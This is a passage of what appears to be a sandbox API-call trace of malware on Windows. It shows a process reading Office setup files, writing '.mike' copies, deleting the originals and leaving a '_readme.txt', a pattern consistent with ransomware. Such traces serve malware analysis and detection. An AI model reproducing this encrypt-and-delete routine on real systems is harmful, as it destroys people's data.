dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.697] GetFileType (hFile=0x288) returned 0x1 [0052.697] GetFileType (hFile=0x288) returned 0x1 [0052.697] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x3c220 [0052.698] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.698] GetFileType (hFile=0x288) returned 0x1 [0052.698] GetFileType (hFile=0x288) returned 0x1 [0052.698] ReadFile (in: hFile=0x288, lpBuffer=0x2197cc8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2197cc8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.705] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.705] GetFileType (hFile=0x288) returned 0x1 [0052.705] GetFileType (hFile=0x288) returned 0x1 [0052.706] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x3ea20 [0052.706] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.707] GetFileType (hFile=0x288) returned 0x1 [0052.707] GetFileType (hFile=0x288) returned 0x1 [0052.707] ReadFile (in: hFile=0x288, lpBuffer=0x21a4d18, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21a4d18*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.708] GetFileType (hFile=0x288) returned 0x1 [0052.708] GetFileType (hFile=0x288) returned 0x1 [0052.708] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x41220 [0052.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.708] GetFileType (hFile=0x288) returned 0x1 [0052.708] GetFileType (hFile=0x288) returned 0x1 [0052.708] ReadFile (in: hFile=0x288, lpBuffer=0x21b1d68, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21b1d68*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.709] GetFileType (hFile=0x288) returned 0x1 [0052.709] GetFileType (hFile=0x288) returned 0x1 [0052.709] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x43a20 [0052.710] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.710] GetFileType (hFile=0x288) returned 0x1 [0052.710] GetFileType (hFile=0x288) returned 0x1 [0052.710] ReadFile (in: hFile=0x288, lpBuffer=0x21bedb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21bedb8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.711] GetFileType (hFile=0x288) returned 0x1 [0052.711] GetFileType (hFile=0x288) returned 0x1 [0052.711] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x46220 [0052.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.712] GetFileType (hFile=0x288) returned 0x1 [0052.712] GetFileType (hFile=0x288) returned 0x1 [0052.712] ReadFile (in: hFile=0x288, lpBuffer=0x21cbe08, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21cbe08*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.713] GetFileType (hFile=0x288) returned 0x1 [0052.713] GetFileType (hFile=0x288) returned 0x1 [0052.713] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x48a20 [0052.713] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.713] GetFileType (hFile=0x288) returned 0x1 [0052.713] GetFileType (hFile=0x288) returned 0x1 [0052.713] ReadFile (in: hFile=0x288, lpBuffer=0x21d8e58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21d8e58*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.714] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.714] GetFileType (hFile=0x288) returned 0x1 [0052.714] GetFileType (hFile=0x288) returned 0x1 [0052.714] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x4b220 [0052.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.715] GetFileType (hFile=0x288) returned 0x1 [0052.715] GetFileType (hFile=0x288) returned 0x1 [0052.715] ReadFile (in: hFile=0x288, lpBuffer=0x21e5ea8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21e5ea8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.716] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.716] GetFileType (hFile=0x288) returned 0x1 [0052.716] GetFileType (hFile=0x288) returned 0x1 [0052.716] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x4da20 [0052.716] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.717] GetFileType (hFile=0x288) returned 0x1 [0052.717] GetFileType (hFile=0x288) returned 0x1 [0052.717] ReadFile (in: hFile=0x288, lpBuffer=0x21f2ef8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21f2ef8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.718] GetFileType (hFile=0x288) returned 0x1 [0052.718] GetFileType (hFile=0x288) returned 0x1 [0052.718] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x50220 [0052.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.718] GetFileType (hFile=0x288) returned 0x1 [0052.718] GetFileType (hFile=0x288) returned 0x1 [0052.718] ReadFile (in: hFile=0x288, lpBuffer=0x21fff48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21fff48*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.719] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.719] GetFileType (hFile=0x288) returned 0x1 [0052.719] GetFileType (hFile=0x288) returned 0x1 [0052.719] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x52a20 [0052.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.720] GetFileType (hFile=0x288) returned 0x1 [0052.750] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML", dwFileAttributes=0x80) returned 1 [0052.751] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml")) returned 1 [0052.758] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML", dwFileAttributes=0x80) returned 1 [0052.763] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml")) returned 1 [0052.765] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.769] WriteFile (in: hFile=0x288, lpBuffer=0x217244c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x217244c*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.769] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML", dwFileAttributes=0x80) returned 1 [0052.769] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml")) returned 1 [0052.772] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.776] WriteFile (in: hFile=0x288, lpBuffer=0x2199cec*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2199cec*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.777] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.777] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml")) returned 1 [0052.779] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8bec380, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c124e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.779] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e9fff00, ftCreationTime.dwHighDateTime=0x1cba028, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e9fff00, ftLastWriteTime.dwHighDateTime=0x1cba028, nFileSizeHigh=0x0, nFileSizeLow=0x3b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRANDING.DLL", cAlternateFileName="")) returned 1 [0052.779] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8ae19e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8ae19e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8bc6220, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x91ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRANDING.XML.mike", cAlternateFileName="BRANDI~1.MIK")) returned 1 [0052.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4114ea00, ftCreationTime.dwHighDateTime=0x1ca6af2, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x4114ea00, ftLastWriteTime.dwHighDateTime=0x1ca6af2, nFileSizeHigh=0x0, nFileSizeLow=0x11644, dwReserved0=0x0, dwReserved1=0x0, cFileName="OCT.CHM", cAlternateFileName="")) returned 1 [0052.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8bc6220, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8bc6220, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8bec380, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x17e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUI.XML.mike", cAlternateFileName="OFFICE~1.MIK")) returned 1 [0052.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8bec380, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8bec380, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8bec380, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x560, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUISet.XML.mike", cAlternateFileName="OFFICE~2.MIK")) returned 1 [0052.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe164800, ftCreationTime.dwHighDateTime=0x1cac048, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe164800, ftLastWriteTime.dwHighDateTime=0x1cac048, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0x0, dwReserved1=0x0, cFileName="OSETUPUI.DLL", cAlternateFileName="")) returned 1 [0052.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4804a00, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd4804a00, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x3d90, dwReserved0=0x0, dwReserved1=0x0, cFileName="promointl.dll", cAlternateFileName="PROMOI~1.DLL")) returned 1 [0052.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d0b6300, ftCreationTime.dwHighDateTime=0x1ca9107, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2d0b6300, ftLastWriteTime.dwHighDateTime=0x1ca9107, nFileSizeHigh=0x0, nFileSizeLow=0x9339, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSCONFIG.CHM", cAlternateFileName="")) returned 1 [0052.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a8bce00, ftCreationTime.dwHighDateTime=0x1ca910f, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7a8bce00, ftLastWriteTime.dwHighDateTime=0x1ca910f, nFileSizeHigh=0x0, nFileSizeLow=0x6931, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSS10O.CHM", cAlternateFileName="")) returned 1 [0052.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7d4800, ftCreationTime.dwHighDateTime=0x1ca910f, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa7d4800, ftLastWriteTime.dwHighDateTime=0x1ca910f, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSS10R.CHM", cAlternateFileName="")) returned 1 [0052.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49087c00, ftCreationTime.dwHighDateTime=0x1ca95c1, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x49087c00, ftLastWriteTime.dwHighDateTime=0x1ca95c1, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.CHM", cAlternateFileName="")) returned 1 [0052.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8bec380, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8bec380, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8bec380, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x26b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0052.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8bc6220, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8bc6220, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c124e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8bc6220, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8bc6220, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8c124e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.780] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.780] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.780] CoTaskMemFree (pv=0x502980) [0052.781] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19b82c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.781] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc138cb0, 